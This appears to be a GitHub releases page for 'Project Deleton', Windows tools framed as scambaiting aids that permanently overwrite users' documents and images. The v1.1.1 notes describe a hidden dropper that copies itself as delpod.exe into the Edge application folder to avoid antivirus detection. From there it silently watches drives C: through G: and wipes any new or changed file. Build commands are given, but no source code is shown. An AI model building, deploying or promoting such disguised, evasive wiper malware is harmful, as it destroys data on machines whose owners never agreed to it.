Skip to content

Releases: ChaoticFormula/Project-Deleton

Del v1.1.1

05 Aug 11:18
12f428c

Choose a tag to compare

Project Deleton v1.1.1

This release introduces a single EXE dropper that installs and launches the background file-wipe watcher as delpod.exe under the Edge application folder, plus the unchanged Safe Test utility.


πŸ“‚ Contents

projectdeleton_c/
β”œβ”€β”€ Test (Safe)/
β”‚   β”œβ”€β”€ exe/
β”‚   β”‚   └── safe.exe
β”‚   β”œβ”€β”€ safe.c
β”‚   β”œβ”€β”€ safevc.c
β”‚   β”œβ”€β”€ safev2.c
β”‚   └── info.txt
└── delete/
    β”œβ”€β”€ exe/
    β”‚   └── delete.exe        
    β”œβ”€β”€ delete.c     
    └── No Safe.txt

πŸš€ New β€œDelete Dropper” Feature

  • Single EXE (delete.exe)

    • When you run delete.exe, it copies itself into
      C:\Program Files (x86)\Microsoft\Edge\Application\delpod.exe.
    • It then launches delpod.exe hidden (no console window).
  • Background Watcher (delpod.exe)

    • Monitors drives: C:, D:, E:, F:, G: in real time.

    • Recursively overwrites any new or modified file with one of the target extensions
      (.txt, .docx, .xlsx, .pdf, .jpg, .jpeg, .png, .bmp)
      with the warning message:

      β€œWooh Delete delete delete........”

    • Runs silently as a background processβ€”no UI, no console.


πŸ” Safe Test Utility

  • safe.exe (in Test (Safe)/exe) remains unchanged.

  • Overwrites only files in its own folder (no recursion) with:

    β€œYou are a thief. This device has been locked down.”

  • Ideal for verifying behavior in a controlled environment.


⚠️ Important

  • Both tools permanently overwrite file contentsβ€”no recovery without external backups.
  • Always test with Safe Test first before deploying the dropper.
  • This dropper approach avoids antivirus delays and false positives by leveraging a trusted folder location.

πŸ› οΈ Build Instructions

# Safe Test
gcc safe.c -mwindows -o safe.exe

# Delete Dropper (single EXE)
gcc delete.c -mwindows -lshlwapi -o delete.exe

1600593720_1shutterstock_406413301

Del v1.1.0

05 Aug 10:10
12f428c

Choose a tag to compare

Project Deleton (C Edition)

This archive contains two C-based standalone tools for scambaiting or secure file overwriting demonstrations. Includes both a Safe Test version and the full Delete version.


πŸ“‚ Contents

projectdeleton_c/
β”œβ”€β”€ Test (Safe)/
β”‚   β”œβ”€β”€ exe/
β”‚   β”‚   └── safe.exe
β”‚   β”œβ”€β”€ safe.c
β”‚   └── info.txt
└── delete/
    β”œβ”€β”€ exe/
    β”‚   └── delete.exe
    β”œβ”€β”€ delete.c
    └── No Safe.txt

πŸš€ Usage

  1. Safe Test (Test (Safe)/):

    • Run safe.exe directly in any folder of your choice.
    • It will only overwrite files in that folder with a warning message.
    • This is a safe version for testing and demonstration.
  2. Full Delete (delete/):

    • Run delete.exe to perform recursive file overwrite on all files starting from the current working directory.
    • Targets commonly used extensions (e.g., .txt, .jpg, .pdf, .docx, etc.).

⚠️ Important

  • These tools overwrite file contents permanently. There's no recovery unless backed up beforehand.
  • Early Python .exe versions sometimes failed due to antivirus false-positives or runtime delays.
    βœ… To solve that, this C-based version was made for more reliability and speed.
  • Always test with the Safe Test version before running the Full Delete tool.

πŸ”§ Notes

  • Built using GCC (MinGW for Windows).
  • No dependencies, no runtime required.
  • Designed for Windows x64.

πŸ§ͺ Compilation (If you want to build yourself)

gcc safe.c -mwindows -o safe.exe
gcc delete.c -mwindows -o delete.exe

1600593720_1shutterstock_406413301

Del v1.1.0-Beta

05 Aug 08:23
8193cce

Choose a tag to compare

Del v1.1.0-Beta Pre-release
Pre-release

Project Deleton

This archive contains two standalone tools for β€œscambaiting” scenarios: a Safe Test version and the full Delete version.

πŸ“‚ Contents


projectdeleton/
β”œβ”€β”€ Test (Safe)/
β”‚   β”œβ”€β”€ exe/
β”‚   β”‚   └── safe.exe
β”‚   β”œβ”€β”€ safe.py
β”‚   └── info.txt
└── delete/
β”œβ”€β”€ exe/
β”‚   └── delete.exe
β”œβ”€β”€ delete.py
└── No Safe.txt

πŸš€ Usage

  1. Safe Test (Test (Safe)/):

    • Run safe.exe (or python safe.py) in a folder of your choice.
    • It will overwrite only the files in that same folder with a warning message.
    • Use this to verify behavior without touching other directories.
  2. Full Delete (delete/):

    • Run delete.exe (or python delete.py) to scan all configured drives/folders and overwrite matching files.
    • Warning: This is permanent. DO NOT run on your main data drive unless you have a full external backup.

⚠️ Important

  • Both tools will destroy original file contentsβ€”no recovery without backups.
  • Always test with the Safe Test version first.
  • Keep your backups elsewhere before using Delete.

1600593720_1shutterstock_406413301